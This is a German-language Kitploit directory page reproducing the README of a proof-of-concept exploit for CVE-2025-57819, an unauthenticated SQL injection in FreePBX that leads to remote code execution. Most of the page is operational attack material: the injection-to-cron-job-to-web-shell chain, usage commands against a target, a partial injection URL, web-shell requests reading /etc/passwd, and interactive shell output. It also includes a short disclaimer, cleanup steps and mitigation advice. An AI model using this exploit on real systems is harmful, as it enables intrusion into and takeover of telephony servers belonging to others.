Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-57819-POC — Nicht authentifizierte SQL-Injection in FreePBX führt zu Remote Code Execution. FreePBX 15 (unter 15.0.66), 16 (unter 16.0.89), 17 (unter 17.0.3). Die Schwachstelle befindet sich im kommerziellen „Endpoint“-Modul. Aufgrund unzureichender Filterung von Benutzereingaben ermöglicht sie einem nicht authentifizierten Angreifer, Administratorrechte zu umgehen, eine SQL-Injection durchzuführen und letztendlich eine Remote Code Execution zu erreichen. | Kitploit
Tools/GitHubGitHub/neobee714/cve-2025-57819-poc
SchwachstellenscannerCode-AnalyseExploitationWebsicherheitLernen & Bildung
GitHubneobee714/cve-2025-57819-poc

CVE-2025-57819-POC

Repository anzeigen
56vor 1 MonatNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →

Über

Nicht authentifizierte SQL-Injection in FreePBX führt zu Remote Code Execution. FreePBX 15 (unter 15.0.66), 16 (unter 16.0.89), 17 (unter 17.0.3). Die Schwachstelle befindet sich im kommerziellen „Endpoint“-Modul. Aufgrund unzureichender Filterung von Benutzereingaben ermöglicht sie einem nicht authentifizierten Angreifer, Administratorrechte zu umgehen, eine SQL-Injection durchzuführen und letztendlich eine Remote Code Execution zu erreichen.

Teilen

CVE-2025-57819 — FreePBX SQL Injection → RCE PoC

CVE-2025-57819 ist eine kritische SQL-Injection-Schwachstelle in FreePBX, die es einem nicht authentifizierten Angreifer ermöglicht, durch die Verkettung einer SQL-Injection mit einer Cron-Job-Injection eine Remote Code Execution zu erreichen.

⚠️ Haftungsausschluss: Dieses Repository dient ausschließlich autorisierten Sicherheitstests und Bildungszwecken. Die unbefugte Nutzung dieses Exploits gegen Systeme, die Ihnen nicht gehören oder für die Sie keine ausdrückliche Erlaubnis zum Testen haben, ist illegal. Der Autor übernimmt keine Verantwortung für Missbrauch oder Schäden.


Übersicht über die Schwachstelle

FeldDetail
CVECVE-2025-57819
Betroffenes ProduktFreePBX (vor Authentifizierung)
SchwachstellentypSQL Injection (gestapelte Abfragen)
AuswirkungRemote Code Execution (RCE)
AngriffsvektorNetzwerk (HTTP GET)
Erforderliche Authentifizierung❌ Keine

Exploit-Kette

root@kitploit:~
┌────────────────────────────────────────────────────────────────┐
│ 1. SQL Injection                                               │
│    POST /admin/ajax.php?brand= → gestapelte Abfrage            │
│    INSERT INTO cron_jobs …                                     │
├────────────────────────────────────────────────────────────────┤
│ 2. Cron-Job-Injection                                          │
│    Bösartiger Cron-Job schreibt base64-dekodiertes PHP-Webshell│
│    nach /var/www/html/shell.php                                │
├────────────────────────────────────────────────────────────────┤
│ 3. WebShell-Zugriff                                            │
│    GET /shell.php?cmd=<command> → beliebige Codeausführung     │
└────────────────────────────────────────────────────────────────┘

Funktionsweise

  1. Der Endpunkt /admin/ajax.php verarbeitet den Parameter brand ohne ordnungsgemäße Bereinigung, was gestapelte SQL-Abfragen ermöglicht.
  2. Der Angreifer injiziert eine INSERT INTO cron_jobs-Anweisung, die jede Minute einen bösartigen Befehl einplant.
  3. Der Cron-Job dekodiert ein base64-codiertes PHP-Webshell und schreibt es in das Web-Root-Verzeichnis.
  4. Sobald es geschrieben ist, kann der Angreifer über das Webshell beliebige Systembefehle ausführen.

Schnellstart

root@kitploit:~
# Klonen
git clone [email protected]:Neobee714/CVE-2025-57819-POC.git
cd CVE-2025-57819-POC

# Abhängigkeit installieren
pip install requests

# Grundlegende Nutzung
python exploit.py <target>

# Nach der Injektion in die interaktive Shell wechseln
python exploit.py <target> --shell

# Einen einzelnen Befehl ausführen
python exploit.py <target> --cmd "cat /etc/passwd"

Nutzung

root@kitploit:~
usage: exploit.py [-h] [-p PORT] [--shell] [--cmd CMD]
                  [--param PARAM] [--no-wait] [-v]
                  target

CVE-2025-57819 – FreePBX SQLi → Cron → WebShell

positional arguments:
  target                Ziel-Hostname oder IP (mit optionalem Schema)

options:
  -h, --help            Diese Hilfemeldung anzeigen und beenden
  -p, --port PORT       Port (Standard: 80/443)
  --shell               Nach der Injektion in die interaktive Shell wechseln
  --cmd CMD             Einen einzelnen Befehl über das Webshell ausführen
  --param PARAM         Webshell-Abfragezeichenfolgen-Parameter (Standard: cmd)
  --no-wait             Die Webshell-Überprüfungsabfrage überspringen
  -v, -vv               Ausführlichkeit erhöhen (-v info, -vv debug)

Beispiele

root@kitploit:~
# Ziel mit Standard-HTTP-Port
python exploit.py connected.htb

# Ziel mit benutzerdefiniertem Port
python exploit.py 10.10.11.100 -p 8080

# Injizieren, überprüfen und in die interaktive Shell wechseln
python exploit.py 10.10.11.100 --shell

# Injizieren und einen einzelnen Befehl ausführen
python exploit.py connected.htb --cmd "whoami"

# Die Überprüfungsabfrage überspringen (wenn Sie bereits wissen, dass die Shell aktiv ist)
python exploit.py connected.htb --no-wait --cmd "id"

# Ausführliche Ausgabe zum Debuggen
python exploit.py connected.htb -vv --shell

Interaktive Shell

Bei Verwendung von --shell wechselt das Skript in ein Pseudo-Terminal:

root@kitploit:~
$ whoami
www-data
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ exit
[*] Shell-Sitzung beendet.

Geben Sie exit (oder Strg-C, Strg-D) ein, um die Sitzung zu beenden.


Manuelle Überprüfung

Wenn Sie manuelle Schritte bevorzugen, führt der Exploit drei Dinge aus:

Schritt 1 – Den Cron-Job injizieren

root@kitploit:~
GET /admin/ajax.php?module=FreePBX\modules\endpoint\ajax&command=model&template=x&model=model&brand=x'%20%3BINSERT%20INTO%20cron_jobs%20...

Schritt 2 – ~60 Sekunden warten, bis der Cron-Job ausgeführt wird

Der injizierte Cron-Job (* * * * *) wird jede Minute ausgeführt und schreibt das Webshell.

Schritt 3 – Auf das Webshell zugreifen

root@kitploit:~
GET /shell.php?cmd=id

Bereinigung

Nach dem Test entfernen Sie das Webshell und den Cron-Job-Eintrag:

root@kitploit:~
DELETE FROM cron_jobs WHERE command LIKE '%base64%';

Löschen Sie dann /var/www/html/shell.php vom Dateisystem.


Betroffene Versionen

  • FreePBX-Versionen vor dem Hersteller-Patch
  • Systeme, bei denen /admin/ajax.php ohne Authentifizierung erreichbar ist

Abhilfemaßnahmen

  • Wenden Sie den vom Hersteller bereitgestellten Sicherheits-Patch sofort an
  • Beschränken Sie den Netzwerkzugriff auf die FreePBX-Admin-Oberfläche
  • Stellen Sie sicher, dass der FreePBX-Datenbankbenutzer minimale Berechtigungen hat (Defense in Depth)

Referenzen

  • FreePBX Security Advisories
  • OWASP SQL Injection

Lizenz

Dieses Projekt wird ausschließlich zu Bildungs- und defensiven Sicherheitsforschungszwecken bereitgestellt. Siehe den Haftungsausschluss am Anfang dieses Dokuments.

Tool herunterladen